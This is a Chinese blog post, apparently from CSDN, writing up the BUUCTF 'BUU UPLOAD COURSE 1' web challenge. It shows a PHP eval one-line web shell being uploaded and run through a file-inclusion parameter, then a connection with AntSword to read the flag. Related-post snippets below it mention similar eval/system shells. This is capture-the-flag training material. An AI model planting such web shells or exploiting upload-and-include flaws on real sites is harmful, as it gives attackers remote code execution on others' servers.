【CTF Web】BUUCTF BUU UPLOAD COURSE 1 Writeup(文件上传+PHP+文件包含漏洞)

于 2024-09-12 10:48:11 发布
阅读量809 收藏 4
点赞数 16
分类专栏: CTF Writeup 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138469157
版权

BUU UPLOAD COURSE 1

1
上课用~

点击启动靶机。

解法

疑似存在文件包含漏洞。

http://15a5666e-1796-4f76-b892-0b69cf97df8e.node5.buuoj.cn:81/index.php?file=upload.php

查看网页源代码。判断是后端检查。

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="UTF-8">
    <title>上传文件</title>
</head>
<body>
<div style="text-align: center">
    <h>文件会被上传到 ./uploads</h>
    <form action="index.php?file=upload.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file"/>
        <input type="submit" value="上传"/>
    </form>
</div>
</body>
</html>

上传一句话木马。

<?php @eval($_POST['a']); ?>

文件后缀会被重命名,后缀变为 .jpg。

用蚁剑连接:

http://15a5666e-1796-4f76-b892-0b69cf97df8e.node5.buuoj.cn:81/index.php?file=uploads/66374dbc5c2dc.jpg

连接成功。

在根目录找到 flag。

Flag

flag{6e79908c-7d5e-4ce4-95ca-4ca1b5602f71}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
专栏目录
网络安全 | CTFBUUCTF Brute 1解题详析(BurpSuite爆破实战)
等风来
04-28 5957
4、Cluster bomb:每个变量对应一个字典,并且交集破解尝试每一个组合,每个用户和每个密码进行匹配,两个字典。找到返回长度异于其它payload的请求(在此实例中即为admin),响应页面回显。2、Battering ran:对变量进行同时破解,用户名和密码相同,仅一个字典。由上可知,发送到第6491个请求时才爆破出密码为6491,而这个过程是十分慢的。3、pitch fork:每个变量对应一个字典,用户名和密码一一对应,两个字典。单独抓包时回显仅用户名错误,考虑先爆破用户名。
BUUCTF--BUU UPLOAD COURSE 1
m0_62879498的博客
03-03 7826
BUUCTFBUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: 我们没有办法访问,使用AntSword进行连接也是报错 题目没有设置上传后缀的限制 但是上传之后任意后缀形式都会被改成.jpg格式(无论我们使用什么办法,包括BP改包,放包后依旧以 .jpg 的格式储存),换句话说 .htaccess 配置文件, 也无法使用我们无法使用中国剑蚁进行连接。 查询了大佬的博客
BUUCTF Basic BUU UPLOAD COURSE 1
打工人
03-13 3504
BUUCTF 新手练习题
BUUCTFBUU UPLOAD COURSE 1[WriteUP]
如有错误感谢斧正
04-06 556
这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行。接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了。eval函数是无法直接执行命令的,只能把字符串当作php代码解析。点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面。经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的。的值使得服务器执行system命令。最后也是在根目录下找到了flag。也是可以在根目录找到flag。利用eval函数解析。
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)
小谢的博客
10-25 2832
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)题解
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 741
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
文件包含漏洞汇总-黑客/渗透测试/CTF通用
最新发布
08-09
适用于文件包含漏洞初学者去进一步了解漏洞的利用,总结前人的经验
你不知道的文件上传漏洞php代码分析
12-18
文件上传漏洞网络安全中一个重要的问题,特别是在PHP开发中,因为PHP经常被用来处理服务器端的文件上传。本文将深入探讨文件上传漏洞及其防范措施,主要关注PHP代码分析。 首先,我们要理解文件上传漏洞是如何...
BUUCTF Basic 解题记录--BUU UPLOAD COURSE 1
weixin_43171033的博客
10-07 604
3、上传一句话木马,用jpg格式存储,然后在hackbar 的file= 参数后面替换掉上传的文件路径;并在postdata输入如下命令,执行即可获得flag。1、打开链接发现是让上传文件,随意上传一个txt文件发现直接显示jpg格式,然后尝试其他文件,上传后还是被改成jpg格式;2、打开Hackbar,发现在file= 这个参数替换掉刚才上传的文件路径,能查看到文件的内容;
BUU UPLOAD COURSE 1 文件包含网络安全基础视频教程
m0_58269520的博客
04-05 1034
eval函数是没办法直接执行命令的,它是把字符串当作php代码解析。它是代码执行函数。因为这里不是直接上传php文件,无法用蚁剑直接连接,只能用hackbar输入命令。system函数是php的函数,用来执行系统命令。它是命令执行函数eval结合system函数就可以执行系统命令。
BUUCTF Web upload
H18779083518的博客
05-10 421
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
BUUCTF题解
qq_51175992的博客
05-27 5384
BUUCTF题解,主要包括CTF中的Crypto、Misc方向,其中一些题目的解法参考了其他博主大佬的思路。这个文章主要是用于自学和提供思路解法,会不定时更新
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5430
BUUCTFWeb题解
buuctf web部分题解
weixin_74427106的博客
03-12 1055
考察知识点:非法参数名传参,代码审计,JSFuck打开题目没有什么东西,查看源码,得到这一串代码,进行代码审计;$_SERVER['QUERY_STRING']:指的是查询的字符串,即地址栏?之后的部分;%5f指的是_,那就是查询的字符串中不能存在_,php在解析字符串时会把点和空格解析成_怎么绕过用b.u.p.t或者b+u+p+t进行绕过;这里有详细的记载。
BUUCTF——Web_buuctfweb,精心整理
2401_84160272的博客
04-09 989
登录后便可查看到flagflag为:启动靶机,出现以下页面查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了源码中 给出了 两个文件,还有一个 **hint.php,**这里给出了flag的位置得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.php,flag应该就在这个php文件中文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
m0_62239233的博客
04-22 1544
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
CTF挑战:Web安全漏洞——任意文件上传与下载实战
CTF(Capture The Flag)竞赛中,特别是在Web安全领域,"任意文件上传+任意文件下载"是一个常见的挑战,涉及到黑客技术的运用和Web应用程序的安全漏洞利用。这类题目通常要求参赛者通过精心构造的HTTP请求,上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值